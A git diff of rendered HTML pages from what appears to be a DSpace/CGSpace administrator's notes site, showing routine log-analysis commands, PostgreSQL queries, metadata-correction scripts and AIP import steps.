                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ curl -s 'http://localhost:9200/openrxv-items-temp/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +{
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  "count" : 100875,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +  }
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +}
                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                        Read more → diff --git a/docs/categories/notes/page/3/index.html b/docs/categories/notes/page/3/index.html index f710fb877..9cd9a6e84 100644 --- a/docs/categories/notes/page/3/index.html +++ b/docs/categories/notes/page/3/index.html @@ -10,14 +10,14 @@ - + - + diff --git a/docs/categories/notes/page/4/index.html b/docs/categories/notes/page/4/index.html index 47ddae49a..d3151d735 100644 --- a/docs/categories/notes/page/4/index.html +++ b/docs/categories/notes/page/4/index.html @@ -10,14 +10,14 @@ - + - + @@ -98,17 +98,17 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/*access.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     4671942
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     1277694
                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • So 4.6 million from XMLUI and another 1.2 million from API requests
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Let’s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                    # zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E "[0-9]{1,2}/Oct/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     1183456 
                                                                                                                                                                                                                                                                                                                                                                                                                                                    -# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                                                    +# zcat --force /var/log/nginx/rest.log.*.gz | grep -E "[0-9]{1,2}/Oct/2019" | grep -c -E "/rest/bitstreams"
                                                                                                                                                                                                                                                                                                                                                                                                                                                     106781
                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                    Read more → @@ -128,7 +128,7 @@

                                                                                                                                                                                                                                                                                                                                                                                                                                                    - 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. + 2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script’s “unneccesary Unicode” fix: $ csvcut -c 'id,dc. Read more → @@ -151,7 +151,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                  # zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                       440 17.58.101.255
                                                                                                                                                                                                                                                                                                                                                                                                                                                       441 157.55.39.101
                                                                                                                                                                                                                                                                                                                                                                                                                                                       485 207.46.13.43
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -162,7 +162,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                                       814 207.46.13.212
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2472 163.172.71.23
                                                                                                                                                                                                                                                                                                                                                                                                                                                      6092 3.94.211.189
                                                                                                                                                                                                                                                                                                                                                                                                                                                  -# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E "01/Sep/2019:0" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                        33 2a01:7e00::f03c:91ff:fe16:fcb
                                                                                                                                                                                                                                                                                                                                                                                                                                                        57 3.83.192.124
                                                                                                                                                                                                                                                                                                                                                                                                                                                        57 3.87.77.25
                                                                                                                                                                                                                                                                                                                                                                                                                                                  @@ -323,16 +323,16 @@ DELETE 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                              # cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
                                                                                                                                                                                                                                                                                                                                                                                                                                                  4432 200
                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                              • In the last two weeks there have been 47,000 downloads of this same exact PDF by these three IP addresses
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Apply country and region corrections and deletions on DSpace Test and CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
                                                                                                                                                                                                                                                                                                                                                                                                                                              +$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                              Read more → @@ -388,7 +388,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!
                                                                                                                                                                                                                                                                                                                                                                                                                                            • The top IPs before, during, and after this latest alert tonight were:
                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "01/Feb/2019:(17|18|19|20|21)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                 245 207.46.13.5
                                                                                                                                                                                                                                                                                                                                                                                                                                                 332 54.70.40.11
                                                                                                                                                                                                                                                                                                                                                                                                                                                 385 5.143.231.38
                                                                                                                                                                                                                                                                                                                                                                                                                                            @@ -404,7 +404,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
                                                                                                                                                                                                                                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                                                                                                                                                                          • The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase
                                                                                                                                                                                                                                                                                                                                                                                                                                          • There were just over 3 million accesses in the nginx logs last month:
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                          # time zcat --force /var/log/nginx/* | grep -cE "[0-9]{1,2}/Jan/2019"
                                                                                                                                                                                                                                                                                                                                                                                                                                           3018243
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           real    0m19.873s
                                                                                                                                                                                                                                                                                                                                                                                                                                          diff --git a/docs/categories/notes/page/5/index.html b/docs/categories/notes/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                                          index f7a221b01..197e17d40 100644
                                                                                                                                                                                                                                                                                                                                                                                                                                          --- a/docs/categories/notes/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                                          +++ b/docs/categories/notes/page/5/index.html
                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -10,14 +10,14 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                          @@ -95,7 +95,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                           
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning
                                                                                                                                                                                                                                                                                                                                                                                                                                        • I don’t see anything interesting in the web server logs around that time though:
                                                                                                                                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                        # zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E "02/Jan/2019:0(1|2|3)" | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                              92 40.77.167.4
                                                                                                                                                                                                                                                                                                                                                                                                                                              99 210.7.29.100
                                                                                                                                                                                                                                                                                                                                                                                                                                             120 38.126.157.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        @@ -293,7 +293,7 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Time to index ~70,000 items on CGSpace:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • diff --git a/docs/categories/notes/page/6/index.html b/docs/categories/notes/page/6/index.html index bfc0ed4d6..e4158762f 100644 --- a/docs/categories/notes/page/6/index.html +++ b/docs/categories/notes/page/6/index.html @@ -10,14 +10,14 @@ - + - + @@ -151,11 +151,11 @@
                                                                                                                                                                                                                                                                                                                                                                                                                                      • I notice this error quite a few times in dspace.log:
                                                                                                                                                                                                                                                                                                                                                                                                                                      2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
                                                                                                                                                                                                                                                                                                                                                                                                                                      -org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                                                      +org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • And there are many of these errors every day for the past month:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ grep -c "Error while searching for sidebar facets" dspace.log.*
                                                                                                                                                                                                                                                                                                                                                                                                                                       dspace.log.2017-11-21:4
                                                                                                                                                                                                                                                                                                                                                                                                                                       dspace.log.2017-11-22:1
                                                                                                                                                                                                                                                                                                                                                                                                                                       dspace.log.2017-11-23:4
                                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -251,12 +251,12 @@ dspace.log.2018-01-02:34
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      # grep -c "CORE" /var/log/nginx/access.log
                                                                                                                                                                                                                                                                                                                                                                                                                                       0
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Generate list of authors on CGSpace for Peter to go through and correct:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
                                                                                                                                                                                                                                                                                                                                                                                                                                       COPY 54701
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                      Read more → diff --git a/docs/cgiar-library-migration/index.html b/docs/cgiar-library-migration/index.html index fa8cab1e4..d2e4ebbff 100644 --- a/docs/cgiar-library-migration/index.html +++ b/docs/cgiar-library-migration/index.html @@ -18,7 +18,7 @@ - + @@ -163,7 +163,7 @@ mets.dspaceAIP.ingest.crosswalk.DSPACE-ROLES = NIL
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Import communities and collections, paying attention to options to skip missing parents and ignore handles:
                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit -XX:+TieredCompilation -XX:TieredStopAtLevel=1"
                                                                                                                                                                                                                                                                                                                                                                                                                                       $ export PATH=$PATH:/home/cgspace.cgiar.org/bin
                                                                                                                                                                                                                                                                                                                                                                                                                                       $ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2515/10947-2515.zip
                                                                                                                                                                                                                                                                                                                                                                                                                                       $ dspace packager -r -u -a -t AIP -o skipIfParentMissing=true -e aorth@mjanja.ch -p 10568/83389 10947-2516/10947-2516.zip
                                                                                                                                                                                                                                                                                                                                                                                                                                      @@ -201,7 +201,7 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
                                                                                                                                                                                                                                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                    $ for item in 10568-93759/ITEM@10947-46*; do dspace packager -r -t AIP -o ignoreHandle=false -o ignoreParent=true -e aorth@mjanja.ch -p 10568/83538 $item; done
                                                                                                                                                                                                                                                                                                                                                                                                                                     

                                                                                                                                                                                                                                                                                                                                                                                                                                    Get the handles for the last few items from CGIAR Library that were created since we did the migration to DSpace Test in May:

                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                    dspace=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id in (select item_id from metadatavalue where metadata_field_id=11 and date(text_value) > '2017-05-01T00:00:00Z');
                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Export them from the CGIAR Library:
                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -218,19 +218,19 @@ $ for item in 10568-93760/ITEM@10947-465*; do dspace packager -r -f -u -t AIP -e
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Enable nightly index-discovery cron job
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Adjust CGSpace’s handle-server/config.dct to add the new prefix alongside our existing 10568, ie:
                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  "server_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                  "server_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                   )
                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"replication_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"replication_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                   )
                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"backup_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  -"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"backup_admins" = (
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10568"
                                                                                                                                                                                                                                                                                                                                                                                                                                  +"300:0.NA/10947"
                                                                                                                                                                                                                                                                                                                                                                                                                                   )
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  I had been regenerated the sitebndl.zip file on the CGIAR Library server and sent it to the Handle.net admins but they said that there were mismatches between the public and private keys, which I suspect is due to make-handle-config not being very flexible. After discussing our scenario with the Handle.net admins they said we actually don’t need to send an updated sitebndl.zip for this type of change, and the above config.dct edits are all that is required. I guess they just did something on their end by setting the authoritative IP address for the 10947 prefix to be the same as ours…

                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -250,17 +250,17 @@ $ sudo systemctl start nginx

                                                                                                                                                                                                                                                                                                                                                                                                                                  Troubleshooting

                                                                                                                                                                                                                                                                                                                                                                                                                                  Foreign Key Error in dspace cleanup

                                                                                                                                                                                                                                                                                                                                                                                                                                  The cleanup script is sometimes used during import processes to clean the database and assetstore after failed AIP imports. If you see the following error with dspace cleanup -v:

                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                  -  Detail: Key (bitstream_id)=(119841) is still referenced from table "bundle".
                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                  Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"                                                                                                                       
                                                                                                                                                                                                                                                                                                                                                                                                                                  +  Detail: Key (bitstream_id)=(119841) is still referenced from table "bundle".
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  The solution is to set the primary_bitstream_id to NULL in PostgreSQL:

                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (119841);
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  PSQLException During AIP Ingest

                                                                                                                                                                                                                                                                                                                                                                                                                                  After a few rounds of ingesting—possibly with failures—you might end up with inconsistent IDs in the database. In this case, during AIP ingest of a single collection in submit mode (-s):

                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                  org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                  org.dspace.content.packager.PackageValidationException: Exception while ingesting 10947-2527/10947-2527.zip, Reason: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"                                    
                                                                                                                                                                                                                                                                                                                                                                                                                                     Detail: Key (handle_id)=(86227) already exists.
                                                                                                                                                                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                                                                                                                                                                  The normal solution is to run the update-sequences.sql script (with Tomcat shut down) but it doesn’t seem to work in this case. Finding the maximum handle_id and manually updating the sequence seems to work:

                                                                                                                                                                                                                                                                                                                                                                                                                                  dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
                                                                                                                                                                                                                                                                                                                                                                                                                                  -dspace=# select setval('handle_seq',86873);
                                                                                                                                                                                                                                                                                                                                                                                                                                  +dspace=# select setval('handle_seq',86873);
                                                                                                                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                                                                                                                  diff --git a/docs/cgspace-cgcorev2-migration/index.html b/docs/cgspace-cgcorev2-migration/index.html index d9a1b740a..855b493b3 100644 --- a/docs/cgspace-cgcorev2-migration/index.html +++ b/docs/cgspace-cgcorev2-migration/index.html @@ -18,7 +18,7 @@ - + @@ -445,7 +445,7 @@

                                                                                                                                                                                                                                                                                                                                                                                                                                ¹ Not committed yet because I don’t want to have to make minor adjustments in multiple commits. Re-apply the gauntlet of fixes with the sed script:

                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                $ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname "*.xsl" -exec sed -i -f ./cgcore-xsl-replacements.sed {} \;
                                                                                                                                                                                                                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                                                                                                                                                                                                                diff --git a/docs/cgspace-dspace6-upgrade/index.html b/docs/cgspace-dspace6-upgrade/index.html index fd22554fc..17459f7fd 100644 --- a/docs/cgspace-dspace6-upgrade/index.html +++ b/docs/cgspace-dspace6-upgrade/index.html @@ -18,7 +18,7 @@ - + @@ -129,283 +129,283 @@

                                                                                                                                                                                                                                                                                                                                                                                                                              Re-import OAI with clean index

                                                                                                                                                                                                                                                                                                                                                                                                                              After the upgrade is complete, re-index all items into OAI with a clean index:

                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                              $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
                                                                                                                                                                                                                                                                                                                                                                                                                              -$ dspace oai -c import
                                                                                                                                                                                                                                                                                                                                                                                                                              -

